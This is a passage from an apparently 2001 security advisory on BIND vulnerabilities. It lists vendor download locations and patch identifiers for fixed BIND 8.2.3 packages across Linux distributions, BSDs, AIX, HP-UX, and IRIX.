ftp://atualizacoes.conectiva.com.br/4.0/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/bind-chroot-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/bind-chroot-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/bind-chroot-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/bind-chroot-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/bind-chroot-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-chroot-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bind-chroot-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bind-chroot-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bind-utils-8.2.3-1cl.i386.rpm
For Red Hat:
ftp://updates.redhat.com/5.2/SRPMS/bind-8.2.3-0.5.x.src.rpm
ftp://updates.redhat.com/5.2/alpha/bind-8.2.3-0.5.x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/bind-devel-8.2.3-0.5.x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/bind-utils-8.2.3-0.5.x.alpha.rpm
ftp://updates.redhat.com/5.2/i386/bind-8.2.3-0.5.x.i386.rpm
ftp://updates.redhat.com/5.2/i386/bind-devel-8.2.3-0.5.x.i386.rpm
ftp://updates.redhat.com/5.2/i386/bind-utils-8.2.3-0.5.x.i386.rpm
ftp://updates.redhat.com/5.2/sparc/bind-8.2.3-0.5.x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/bind-devel-8.2.3-0.5.x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/bind-utils-8.2.3-0.5.x.sparc.rpm
ftp://updates.redhat.com/6.2/SRPMS/bind-8.2.3-0.6.x.src.rpm
ftp://updates.redhat.com/6.2/alpha/bind-8.2.3-0.6.x.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/bind-devel-8.2.3-0.6.x.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/bind-utils-8.2.3-0.6.x.alpha.rpm
ftp://updates.redhat.com/6.2/i386/bind-8.2.3-0.6.x.i386.rpm
ftp://updates.redhat.com/6.2/i386/bind-devel-8.2.3-0.6.x.i386.rpm
ftp://updates.redhat.com/6.2/i386/bind-utils-8.2.3-0.6.x.i386.rpm
ftp://updates.redhat.com/6.2/sparc/bind-8.2.3-0.6.x.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/bind-devel-8.2.3-0.6.x.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/bind-utils-8.2.3-0.6.x.sparc.rpm
ftp://updates.redhat.com/7.0/SRPMS/bind-8.2.3-1.src.rpm
ftp://updates.redhat.com/7.0/alpha/bind-8.2.3-1.alpha.rpm
ftp://updates.redhat.com/7.0/alpha/bind-devel-8.2.3-1.alpha.rpm
ftp://updates.redhat.com/7.0/alpha/bind-utils-8.2.3-1.alpha.rpm
ftp://updates.redhat.com/7.0/i386/bind-8.2.3-1.i386.rpm
ftp://updates.redhat.com/7.0/i386/bind-devel-8.2.3-1.i386.rpm
ftp://updates.redhat.com/7.0/i386/bind-utils-8.2.3-1.i386.rpm
For Debian:
http://security.debian.org/dists/stable/updates/main/source/bind_8.2.3-0.potato.1.diff.gz
http://security.debian.org/dists/stable/updates/main/source/bind_8.2.3-0.potato.1.dsc
http://security.debian.org/dists/stable/updates/main/source/bind_8.2.3.orig.tar.gz
http://security.debian.org/dists/stable/updates/main/binary-i386/bind-dev_8.2.3-0.potato.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/bind_8.2.3-0.potato.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/dnsutils_8.2.3-0.potato.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/bind-dev_8.2.3-0.potato.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/bind_8.2.3-0.potato.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/dnsutils_8.2.3-0.potato.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/bind-dev_8.2.3-0.potato.1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/bind_8.2.3-0.potato.1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/dnsutils_8.2.3-0.potato.1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/bind-dev_8.2.3-0.potato.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/bind_8.2.3-0.potato.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/dnsutils_8.2.3-0.potato.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/bind-dev_8.2.3-0.potato.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/bind_8.2.3-0.potato.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/dnsutils_8.2.3-0.potato.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/bind-dev_8.2.3-0.potato.1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/bind_8.2.3-0.potato.1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/dnsutils_8.2.3-0.potato.1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-all/bind-doc_8.2.3-0.potato.1_all.deb
http://security.debian.org/dists/stable/updates/main/binary-all/task-dns-server_8.2.3-0.potato.1_all.deb
For Slackware:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slakware/n1/bind.tgz
ftp://ftp.slackware.com/pub/slackware/slackware-7.1/patches/packages/bind.tgz
For FreeBSD:
http://www.freebsd.org/~kris/bind-8.2.3-4.x.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/net/bind-8.2.3.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/net/bind-8.2.3.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/net/bind-8.2.3.tgz
For AIX:
AIX 4.3.3: IY16182
A temporary fix for AIX 4.3.3 systems is available. The temporary
fix can be downloaded via ftp from:
ftp://aix.software.ibm.com/aix/efixes/security/multiple_bind_vulns_efix.tar.Z
For Caldera Systems:
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/SRPMS
RPMS/bind-8.2.3-1.i386.rpm
RPMS/bind-doc-8.2.3-1.i386.rpm
RPMS/bind-utils-8.2.3-1.i386.rpm
SRPMS/bind-8.2.3-1.src.rpm
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/SRPMS
RPMS/bind-8.2.3-1.i386.rpm
RPMS/bind-doc-8.2.3-1.i386.rpm
RPMS/bind-utils-8.2.3-1.i386.rpm
SRPMS/bind-8.2.3-1.src.rpm
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/SRPMS
RPMS/bind-8.2.3-1.i386.rpm
RPMS/bind-doc-8.2.3-1.i386.rpm
RPMS/bind-utils-8.2.3-1.i386.rpm
SRPMS/bind-8.2.3-1.src.rpm
For NetBSD users may update their system source, from the
appropriate release branch or NetBSD-current, and rebuild BIND
(as well as other parts of the system). This method is
recommended for users of NetBSD-current and technically literate
users of the most recent releases on each branch (1.4.3 or 1.5).
Note that the NetBSD release branches contain accumulated changes
and bugfixes since the most recent release; these changes are
intended to improve the system, but have not yet been through the
complete release engineering cycle. Users who wish to remain at a
formal release should use the pkgsrc method instead. System
sources can be updated via anonymous CVS, SUP, or via download of
source tarfiles from the appropriate branch, collection or
directory:
Release CVS branch SUP collection FTP directory
-------------------------------------------------------------------
1.4 netbsd-1-4 release-1-4 /pub/NetBSD/NetBSD-release-1-4
1.5 netbsd-1-5 release-1-5 /pub/NetBSD/NetBSD-release-1-4
current HEAD current /pub/NetBSD/NetBSD-current
Systems running NetBSD-current dated from before 2001-01-28 should
be upgraded to NetBSD-current dated 2001-01-28 or later. For
NetBSD-current, see /usr/src/UPDATING for additional instructions,
as additional dependencies may need to be rebuilt before BIND.
Systems running either NetBSD-release* branch dated from before
2001-01-29 should be upgraded to 2001-01-29 or later.
For TurboLinux:
ftp://ftp.turbolinux.com/pub/updates/6.0/security/bind-8.2.3-2.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/security/bind-contrib-8.2.3-2.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/security/bind-devel-8.2.3-2.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/security/bind-utils-8.2.3-2.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/SRPMS/bind-8.2.3-2.src.rpm
For HpUX:
11.00: PHNE_23274 (BIND 4.9.7)
11.00: * (BIND 8.1.2)
11.11: PHNE_23275 (BIND 8.1.2)
11.04: PHNE_22919 (BIND 4.9.7)
10.20: PHNE_23277 (BIND 4.9.7)
10.24: PHNE_23439 (BIND 4.9.7)
10.10: PHNE_23277 (BIND 4.9.7)
10.01: PHNE_23277 (BIND 4.9.7)
If you have upgraded HP-UX 11.00 BIND to 8.1.2 via the WEB
upgrade you need to upgrade with the latest version of the BIND
package, 1.3 via the website.
For IRIX, install IRIX 6.5.12 when available or patch 4193 for
IRIX 6.5-6.5.11
OS Version Vulnerable? Patch # Other Actions
---------- ----------- ------- -------------
IRIX 3.x unknown Note 1
IRIX 4.x unknown Note 1
IRIX 5.X unknown Note 1
IRIX 6.0.x unknown Note 1
IRIX 6.1 unknown Note 1
IRIX 6.2 unknown Note 1
IRIX 6.3 unknown Note 1
IRIX 6.4 unknown Note 1
IRIX 6.5 yes 4193 Note 2
IRIX 6.5.1 yes 4193 Note 2
IRIX 6.5.2 yes 4193 Note 2
IRIX 6.5.3 yes 4193 Note 2
IRIX 6.5.4 yes 4193 Note 2
IRIX 6.5.5 yes 4193 Note 2
IRIX 6.5.6 yes 4193 Note 2
IRIX 6.5.7 yes 4193 Note 2
IRIX 6.5.8 yes 4193 Note 2
IRIX 6.5.9 yes 4193 Note 2
IRIX 6.5.10 yes 4193 Note 2
IRIX 6.5.11 yes 4193 Note 3 & 4
IRIX 6.5.12 no Note 5
1) This version of the IRIX operating has been retired. Upgrade
to an actively supported IRIX operating system. See
http://support.sgi.com/news/support/index.html#support_policy
for more information.
2) This version of the IRIX operating system is in maintenance
mode. Upgrade to an actively supported IRIX operating system.
http://support.sgi.com/news/support/index.html#support_policy
for more information.
3) If you have not received an Overlay 11 CD for IRIX 6.5,
contact SGI Support Provider
4) Download the IRIX 6.5.11 Maintenance Release Stream from the
http://support.sgi.com/colls/patches/tools/relstream/index.html
5) IRIX 6.5.12 Maintenance Release Stream is scheduled to be
released in May 2001